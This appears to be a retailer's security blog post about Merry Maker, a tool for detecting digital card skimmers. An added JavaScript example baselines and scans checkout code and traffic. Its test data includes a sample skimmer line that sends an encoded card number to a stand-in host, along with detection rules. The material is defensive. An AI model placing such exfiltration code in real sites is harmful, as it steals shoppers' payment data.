Credit card skimmers are custom-made additions to payment devices (like ATMs or gas pumps) that criminals build and use to steal a consumer’s payment information. The threat also exists in digital form, as malicious code covertly inserted into websites to steal credit card information. And with many more people shopping online, protecting against digital skimmers is more important than ever.
A Proactive Defense
Several years ago, we built our own system and technology when we realized there were no readily available solutions in the market to defend against digital skimming. The first step, and the most immediate way to lower risk, was to remove significant amounts of third-party code from Target.com. This was also quite a disruptive approach, given that the holiday season was right around the corner and we were entering peak operations time. We were very thoughtful as we removed the code to ensure the website remained stable and to maintain a frictionless guest experience throughout the process.
Once that was complete, we pivoted to identifying a way to detect the presence of digital skimmers on Target.com. We focused on a few key processes:
- Preserving a baseline of our existing payment pages by saving the code being served by Target.com along with the network traffic generated by test payment transactions
- Scanning the saved code for any malicious indicators
- Scanning the saved network traffic for any potential compromise
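The three processes above, as an added example that is not part of the original post and is not Merry Maker's code. The page paths, host names, indicator rules and test card value are all constructed for illustration.

```javascript
// Constructed data: a saved baseline of a payment page, then a later scan of the same page.
const TEST_PAN = "4111111111111111"; // test card number typed in by the scripted checkout
const PAN_FORMS = [TEST_PAN, Buffer.from(TEST_PAN).toString("base64")];
const baseline = {
  scripts: { "/js/checkout.js": "submitPayment(form);" },
  hosts: ["shop.example", "payments.example"],
};
const scan = {
  scripts: {
    "/js/checkout.js": "submitPayment(form);",
    "/js/metrics.js": "send('https://cdn-metrics.example/c', btoa(cardNumber.value));",
  },
  requests: [
    { url: "https://payments.example/v1/charge", body: "pan=" + TEST_PAN },
    { url: "https://cdn-metrics.example/c?d=" + PAN_FORMS[1], body: "" },
  ],
};
// Hypothetical indicator rules for this example (not Merry Maker's published rules).
const RULES = [
  { name: "reads-card-field", re: /card\w*\.value/i },
  { name: "encodes-value", re: /\bbtoa\(/ },
];

// Steps 1 and 2: diff the served code against the baseline, then run indicator rules on it.
function scanCode(base, current) {
  const findings = [];
  for (const [path, body] of Object.entries(current.scripts)) {
    const saved = base.scripts[path];
    if (saved === undefined) findings.push(`new-script:${path}`);
    else if (saved !== body) findings.push(`changed-script:${path}`);
    for (const rule of RULES) {
      if (rule.re.test(body)) findings.push(`${rule.name}:${path}`);
    }
  }
  return findings;
}

// Step 3: flag requests to hosts absent from the baseline, and test card data sent to them.
function scanTraffic(base, current) {
  const findings = [];
  for (const req of current.requests) {
    const host = new URL(req.url).hostname;
    if (base.hosts.includes(host)) continue; // expected destination, e.g. the processor
    findings.push(`unknown-host:${host}`);
    const payload = req.url + req.body;
    if (PAN_FORMS.some((f) => payload.includes(f))) findings.push(`card-data-leak:${host}`);
  }
  return findings;
}

console.log(scanCode(baseline, scan), scanTraffic(baseline, scan));
```

Because the checkout is scripted with a known test card value, any appearance of that value (plain or encoded) in traffic to a host outside the baseline is a high-confidence signal.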
An Open Defense
Since its launch in 2018, Merry Maker has completed over one million website scans, and we’ve filed multiple patent applications. And why the name Merry Maker? The technology was launched right before Thanksgiving in 2018 and we nicknamed it for its ability to help keep the holiday shopping season – and all shopping occasions – safer and merrier.
Today we’ve open sourced the Merry Maker framework along with several detection rules in the hopes that this information helps other cybersecurity teams stand up their own customized defense. Digital security is a team sport – a threat to one is a threat to all – and entities need to work together to create safe online environments for consumers. We’re proud to be a leading sharer and collaborator across the retail industry and we hope Merry Maker helps others protect against digital skimming attacks.